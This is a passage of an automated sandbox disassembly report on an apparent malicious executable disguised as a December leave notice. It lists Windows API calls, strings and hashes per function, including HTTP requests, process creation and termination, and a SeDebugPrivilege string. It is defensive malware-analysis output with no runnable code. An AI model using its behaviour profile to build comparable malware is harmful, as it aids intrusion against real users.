                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FD468F
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00FD46BF
                                                      • InternetCloseHandle.WININET(00000000), ref: 00FD4706
                                                        • Part of subcall function 00FD5052: GetLastError.KERNEL32(?,?,00FD43CC,00000000,00000000,00000001), ref: 00FD5067
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 1241431887-3916222277
                                                      • Opcode ID: 7fe18f0fa6553b0c4c1db4289af7c54501316a51d811642b7d309c840f9ced39
                                                      • Instruction ID: 1a20e2abe4fc04e94fda21d29a5cbcdf22745d938c565de99998b46cc69b0e99
                                                      • Opcode Fuzzy Hash: 7fe18f0fa6553b0c4c1db4289af7c54501316a51d811642b7d309c840f9ced39
                                                      • Instruction Fuzzy Hash: A241A2B1900209BFEB128F90CC89FBB77ADFF09314F084116F94696281E775E944ABA4
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0101DC00), ref: 00FDB715
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0101DC00), ref: 00FDB749
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FDB8C1
                                                      • SysFreeString.OLEAUT32(?), ref: 00FDB8EB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: 0a1063956f08bc4d7b589fedfef17be6bff695669b548bc42f186437edcab84e
                                                      • Instruction ID: 67e74f14b3f94762aee9c30745645b8e0f16c9c4c82f2acb202a9980bf29bc2c
                                                      • Opcode Fuzzy Hash: 0a1063956f08bc4d7b589fedfef17be6bff695669b548bc42f186437edcab84e
                                                      • Instruction Fuzzy Hash: E2F12B75A00109EFCF04DF94C884EAEB7BAFF49311F158459F915AB250DB35AE42EBA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FE24F5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FE2688
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FE26AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FE26EC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FE270E
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FE286F
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FE28A1
                                                      • CloseHandle.KERNEL32(?), ref: 00FE28D0
                                                      • CloseHandle.KERNEL32(?), ref: 00FE2947
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: a21ea30ba6eb501deabdd9aa6e081e62d6bbcf7493934dd30dc1df77114b3ded
                                                      • Instruction ID: c24ff7afb575e58e0a11c4d8a6822fd61d58908a995c43ea9039bf5bf8e1131f
                                                      • Opcode Fuzzy Hash: a21ea30ba6eb501deabdd9aa6e081e62d6bbcf7493934dd30dc1df77114b3ded
                                                      • Instruction Fuzzy Hash: F2D1D031604341DFDB15EF25C891B6EBBE9AF84320F18845DF8999B2A2DB35DC40EB52
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FEB3F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: 47ce32500f6601850dac58da889886afa10682041e92a0dfb5060230756fee60
                                                      • Instruction ID: 15f1338cb180b5064e18ef5305341bf162a98ba31884dc11c1796b4e7f1098ec
                                                      • Opcode Fuzzy Hash: 47ce32500f6601850dac58da889886afa10682041e92a0dfb5060230756fee60
                                                      • Instruction Fuzzy Hash: 4E51E531A05284BFEF309F6ACC86BAF3B64EB05324F244012F654E61E6C775E940EB51
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FFDB1B
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FFDB3C
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FFDB51
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FFDB6E
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FFDB95
                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00F9A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00FFDBA0
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FFDBBD
                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00F9A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00FFDBC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 86f348b488fbf1aa08b572a65d6b3f6bf2cf5b418c9b058328b61a2493d1dd5f
                                                      • Instruction ID: 5646cb8461d8d5aa40d128527a1cccb0ef7bc15b57aab3493dcb87ebf53fef95
                                                      • Opcode Fuzzy Hash: 86f348b488fbf1aa08b572a65d6b3f6bf2cf5b418c9b058328b61a2493d1dd5f
                                                      • Instruction Fuzzy Hash: F1517D70A00209EFEF24DFA4CC82FAA37B5AF48764F100518FA4697290D775EC90EB91
                                                      APIs
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FC5FA6,?), ref: 00FC6ED8
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FC5FA6,?), ref: 00FC6EF1
                                                        • Part of subcall function 00FC72CB: GetFileAttributesW.KERNEL32(?,00FC6019), ref: 00FC72CC
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00FC75CA
                                                      • _wcscmp.LIBCMT ref: 00FC75E2
                                                      • MoveFileW.KERNEL32(?,?), ref: 00FC75FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: 7c8c659b6393637936232fa39bfdd69e49fc20e52c3ee8a98d658768db6eb206
                                                      • Instruction ID: bb410ee4e2727ec4c77f0c270119184095efae334187df3dbe90075bf9442c26
                                                      • Opcode Fuzzy Hash: 7c8c659b6393637936232fa39bfdd69e49fc20e52c3ee8a98d658768db6eb206
                                                      • Instruction Fuzzy Hash: 7E511DB2A0921A5ADF51FA94DD42EDE73BCAF08320F0044AEF605E3141EA7496C9DF64
                                                      APIs
                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00F9EAEB
                                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00F9EB32
                                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00FFDC86
                                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00FFDAD1,00000004,00000000,00000000), ref: 00FFDCF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 0748fbd95a424181587b853e30f24552e96b7ebbad7794ce653ae617ae21d7f0
                                                      • Instruction ID: 0c1e9a22e120653de8e73e7ee6e39e29af8c584c6344b760b4f9c911110d308c
                                                      • Opcode Fuzzy Hash: 0748fbd95a424181587b853e30f24552e96b7ebbad7794ce653ae617ae21d7f0
                                                      • Instruction Fuzzy Hash: AD411971A05280DBFF36CF28898DB3A7A96BFD5325F19040DE18B82565D679B840F721
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB26C
                                                      • HeapAlloc.KERNEL32(00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB273
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FBAEF1,00000B00,?,?), ref: 00FBB288
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB290
                                                      • DuplicateHandle.KERNEL32(00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB293
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FBAEF1,00000B00,?,?), ref: 00FBB2A3
                                                      • GetCurrentProcess.KERNEL32(00FBAEF1,00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB2AB
                                                      • DuplicateHandle.KERNEL32(00000000,?,00FBAEF1,00000B00,?,?), ref: 00FBB2AE
                                                      • CreateThread.KERNEL32(00000000,00000000,00FBB2D4,00000000,00000000,00000000), ref: 00FBB2C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 5a6703e4e44e259c425a688dd6490f0e79d684aa81da35a5c708db495b2a84ab
                                                      • Instruction ID: dbe0a2ccc8f62a7d9f9cfc98a37d2f3d0ae6ea8eafdd084c04a925feebdd46f5
                                                      • Opcode Fuzzy Hash: 5a6703e4e44e259c425a688dd6490f0e79d684aa81da35a5c708db495b2a84ab
                                                      • Instruction Fuzzy Hash: 7D01BBB5240304BFE721ABE5DC49F6B7BACEB88711F018411FA45DB195CA75D800CB70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: 6dfeb72ec102393d3636b0ad8a01fa6f944ce8a60a56d5d000d0d9e47fa18227
                                                      • Instruction ID: 0c9c3e718189f29c92ff056e9c1b08d497fea100d85a7950cd5c446d74d2dd65
                                                      • Opcode Fuzzy Hash: 6dfeb72ec102393d3636b0ad8a01fa6f944ce8a60a56d5d000d0d9e47fa18227
                                                      • Instruction Fuzzy Hash: 95E19371E0021AABDF14DFA4D981BAE77B6EF48314F18402AE945AB381D774ED41EB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      • Opcode ID: 3c47c663722b52ba51b7a43027658f1ff849259c47e4fb5bab7adfddc4fc0d56
                                                      • Instruction ID: 42eac9da0b4d68a20be0e6ae2e6c0c953a3d79f8d22b5bd2a8d5f70abc46c82e
                                                      • Opcode Fuzzy Hash: 3c47c663722b52ba51b7a43027658f1ff849259c47e4fb5bab7adfddc4fc0d56
                                                      • Instruction Fuzzy Hash: 60918F71E00219EFDF24CF95C844FAEBBBAEF85720F15815AF505AB280DB709940DBA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset
                                                      • String ID: Q\E$[$\$\$]$^
                                                      • API String ID: 2102423945-1026548749
                                                      • Opcode ID: 955ed95200db6c73e819dee0b1a4991e8fc10efdda5a0e37686df8272ddb66a9
                                                      • Instruction ID: c5dfee790623113712ca44c37b08821e89ee5faff6d2c49f34eefca234dff4e1
                                                      • Opcode Fuzzy Hash: 955ed95200db6c73e819dee0b1a4991e8fc10efdda5a0e37686df8272ddb66a9
                                                      • Instruction Fuzzy Hash: 88516171E002099BDF24EF98C8817EDB7B2BF94324F388166D914A7351E7709D85EB81
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FE9B19
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00FE9B2D
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FE9B47
                                                      • _wcscat.LIBCMT ref: 00FE9BA2
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FE9BB9
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FE9BE7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: 8fc20c3a2e10a5d2f3847bab145f51746405328c875f0dfe7f813dc138d0cae7
                                                      • Instruction ID: af8521eeacd17cf5f3a8d37d9bb00f3efd5f2cf65664f9675b062118a15a07bd
                                                      • Opcode Fuzzy Hash: 8fc20c3a2e10a5d2f3847bab145f51746405328c875f0dfe7f813dc138d0cae7
                                                      • Instruction Fuzzy Hash: BA41D271904348ABEB219FA4DC85BEE77B8EF48360F10042AF585E7282D7B59D84DB60
                                                      APIs
                                                        • Part of subcall function 00FC6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FC6554
                                                        • Part of subcall function 00FC6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FC6564
                                                        • Part of subcall function 00FC6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FC65F9
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FE179A
                                                      • GetLastError.KERNEL32 ref: 00FE17AD
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FE17D9
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FE1855
                                                      • GetLastError.KERNEL32(00000000), ref: 00FE1860
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE1895
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: d39de889c11c227609ad53f1ffe68a599c85373d612897d183b38cfd035dab4b
                                                      • Instruction ID: f78a484875d0e7d7a83b66114080faed3acddb1ec7f433e25855ce3c143957f9
                                                      • Opcode Fuzzy Hash: d39de889c11c227609ad53f1ffe68a599c85373d612897d183b38cfd035dab4b
                                                      • Instruction Fuzzy Hash: 1641BE72A00201AFDB16EF95CCA6FAD77A5BF44710F04805DF9069F282DB79A900EB90
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00FC58B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 99e74e970578790dd21bc480598c54baf475654c957589b3d887825655053108
                                                      • Instruction ID: 0d489986c0597929f9d33b3b9c706f68d7cc0a7e0ea2355f1fcdbdcfff9ca2c1
                                                      • Opcode Fuzzy Hash: 99e74e970578790dd21bc480598c54baf475654c957589b3d887825655053108
                                                      • Instruction Fuzzy Hash: 7111EB76609B43BEE7155A559DC3FAA339CEF16B30B20003EF540E92C1EB64B9806264
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00FCA806
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: be4419ea23f14f0d6539a06fe79cf2504b17490e05b403865498e584d33d6c0f
                                                      • Instruction ID: 5b8a7e5650e95ac573b005be5d77755fd06892cda749807dcf2afc41e60c58a6
                                                      • Opcode Fuzzy Hash: be4419ea23f14f0d6539a06fe79cf2504b17490e05b403865498e584d33d6c0f
                                                      • Instruction Fuzzy Hash: E2C19E75A0420ADFDB14CF98D682BAEB7F4FF08319F20406DE646E7281D739A941DB91
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FC6B63
                                                      • LoadStringW.USER32(00000000), ref: 00FC6B6A
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FC6B80
                                                      • LoadStringW.USER32(00000000), ref: 00FC6B87
                                                      • _wprintf.LIBCMT ref: 00FC6BAD
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FC6BCB
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00FC6BA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: b8caaeb14dc1ba08275ed4d8e9caf608e42d3539aa0c6c99dd8e3701e9171ff9
                                                      • Instruction ID: b46a3c1c036a41120b93c3fedf3b4628261961789c283a277bb54f63942948aa
